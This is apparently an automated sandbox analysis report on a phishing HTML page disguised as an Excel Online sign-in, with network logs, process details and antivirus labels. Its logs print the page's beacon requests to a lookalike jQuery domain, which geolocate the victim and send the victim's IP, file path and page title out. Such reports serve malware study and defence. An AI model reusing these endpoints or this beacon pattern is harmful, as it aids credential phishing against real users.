2024-06-20 16:14:15 UTC	348	OUT	GET /ip.php HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:16 UTC	257	IN	HTTP/1.1 200 OK Date: Thu, 20 Jun 2024 16:14:16 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2024-06-20 16:14:16 UTC	42	IN	Data Raw: 32 34 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 20 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 7d 0d 0a Data Ascii: 24{"ip":"8.46.123.33 : United States"}
2024-06-20 16:14:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49724	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:16 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-06-20 16:14:16 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=172516 Date: Thu, 20 Jun 2024 16:14:16 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49725	38.34.185.163	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:17 UTC	673	OUT	GET /post/index.php?title=Excel%20Online%20Spreadsheet%20::%20Sign%20in&link=file:///C:/Users/user/Desktop/aaaaa.shtml.html&time=2024-6-20%2012:14:14&ip=8.46.123.33%20:%20United%20States HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:19 UTC	257	IN	HTTP/1.1 200 OK Date: Thu, 20 Jun 2024 16:14:17 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2024-06-20 16:14:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49729	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:17 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-06-20 16:14:17 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=172505 Date: Thu, 20 Jun 2024 16:14:17 GMT Content-Length: 55 Connection: close X-CID: 2
2024-06-20 16:14:17 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49728	18.239.36.13	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:17 UTC	351	OUT	GET /office.com HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:17 UTC	553	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 756 Connection: close access-control-allow-origin: * Cache-Control: public, max-age=2592000 Date: Sun, 16 Jun 2024 12:58:01 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Hit from cloudfront Via: 1.1 bb69678e2a9bd96a2b2aa070ba9687a4.cloudfront.net (CloudFront) X-Amz-Cf-Pop: AMS58-P2 X-Amz-Cf-Id: xFj4bBjE2Ilg1x5RyLv4i_L0V4QAoJ8V4dN43C7rF1LpBvfEmFbqIA== Age: 357376
2024-06-20 16:14:17 UTC	756	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 02 bb 49 44 41 54 78 9c ec dd 4d 6a 14 4d 1c 80 f1 aa ea 9e c9 07 bc 09 2f 89 18 88 d1 8d e8 42 14 5c 28 c4 13 78 81 e4 16 2e 3d 85 6b af e0 22 71 eb 09 14 5c 06 11 c4 80 3b 03 7e 90 85 42 8c 1a a7 aa 24 07 70 40 28 ea 59 f8 fc 0e f0 af 64 1e aa 7b 06 a6 7a c6 5a 6b 10 27 d1 7f c0 bf ce 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 1b 1b ce aa c7 1f f2 e1 41 c3 81 f3 cd ae df 5e 5c df a8 e7 0b c7 37 9f f7 bb ad bb b5 ba bd b2 78 a9 d5 b4 96 01 f2 e1 c1 f7 47 0f 1a 0e 9c 23 86 72 f2 f0 f1 c6 da fd 1c 6b aa c3 de eb dd d8 eb 1b 7e 3b b7 f6 6e 2c ee Data Ascii: PNGIHDRL\IDATxMjM/B\(x.=k"q\;~B$p@(Yd{zZk'03030303030A^\7xG#rk~;n,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49731	38.34.185.163	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:20 UTC	523	OUT	GET /post/index.php?title=Excel%20Online%20Spreadsheet%20::%20Sign%20in&link=file:///C:/Users/user/Desktop/aaaaa.shtml.html&time=2024-6-20%2012:14:14&ip=8.46.123.33%20:%20United%20States HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:22 UTC	257	IN	HTTP/1.1 200 OK Date: Thu, 20 Jun 2024 16:14:20 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2024-06-20 16:14:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49737	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:27 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vS6KOkeB56FzUt4&MD=+M+DVe1e HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-20 16:14:27 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 4d47cfb7-8d8a-437a-a66b-71c81cd4874e MS-RequestId: 877ed9b6-7566-49c6-9346-ee7fff29142e MS-CV: SGAcKQUmVkWc6OGQ.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 20 Jun 2024 16:14:26 GMT Connection: close Content-Length: 24490
2024-06-20 16:14:27 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-06-20 16:14:27 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	55238	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:45 UTC	124	OUT	GET /sls/ping HTTP/1.1 Connection: Keep-Alive User-Agent: DNS resiliency checker/1.0 Host: slscr.update.microsoft.com
2024-06-20 16:14:45 UTC	318	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 MS-CV: rWaCsj8OdEe4baPu.0 MS-RequestId: 75a9a0b3-77b2-4da3-8293-5cc3d1c03a9c MS-CorrelationId: 89d3a2d4-bbb5-47c5-b9a3-b25385838ecf X-Content-Type-Options: nosniff Date: Thu, 20 Jun 2024 16:14:45 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	55239	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:47 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vS6KOkeB56FzUt4&MD=+M+DVe1e HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-20 16:14:47 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 939b9b5a-a48d-44fd-8915-825e776d8002 MS-RequestId: bb1a64c0-30d5-4848-b592-17dbab23c5fa MS-CV: Szg/YXYVy0+FMbO+.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 20 Jun 2024 16:14:47 GMT Connection: close Content-Length: 24490
2024-06-20 16:14:47 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-06-20 16:14:47 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	55240	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:49 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vS6KOkeB56FzUt4&MD=+M+DVe1e HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-20 16:14:49 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 89132bdb-479d-4dc1-ba10-745b8103400a MS-RequestId: e3320e79-f6f4-4e70-bfcb-1288787643da MS-CV: RhDc4zZrXUS6FFxg.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 20 Jun 2024 16:14:48 GMT Connection: close Content-Length: 30005
2024-06-20 16:14:49 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-06-20 16:14:49 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 6012, Parent PID: 6936

General

Target ID:	1
Start time:	12:14:05
Start date:	20/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\aaaaa.shtml.html"
Imagebase:	0x7ff6c5c30000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 3464, Parent PID: 6012

General

Target ID:	3
Start time:	12:14:08
Start date:	20/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1960,i,11415482237195568552,12706439463585877123,262144 /prefetch:8
Imagebase:	0x7ff6c5c30000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://code.jquery.com.de/ip.php	Avira URL Cloud: Label: malware
Source: https://code.jquery.com.de/jquery-3.5.1.min.js	Avira URL Cloud: Label: malware
Source: https://code.jquery.com.de/post/index.php?title=Excel%20Online%20Spreadsheet%20::%20Sign%20in&link=file:///C:/Users/user/Desktop/aaaaa.shtml.html&time=2024-6-20%2012:14:14&ip=8.46.123.33%20:%20United%20States	Avira URL Cloud: Label: malware

Source: Yara match	File source: aaaaa.shtml.html, type: SAMPLE
Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Source: Joe Sandbox View	IP Address: 38.34.185.163 38.34.185.163
Source: Joe Sandbox View	IP Address: 104.18.11.207 104.18.11.207
Source: Joe Sandbox View	IP Address: 104.18.11.207 104.18.11.207
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 18.239.36.50 18.239.36.50

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /eae24034-0cc9-4528-827a-d46e30dd5a83/hover.css HTTP/1.1Host: ucarecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.5.1.min.js HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ispol.com.pl HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip.php HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /office.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip.php HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /post/index.php?title=Excel%20Online%20Spreadsheet%20::%20Sign%20in&link=file:///C:/Users/user/Desktop/aaaaa.shtml.html&time=2024-6-20%2012:14:14&ip=8.46.123.33%20:%20United%20States HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
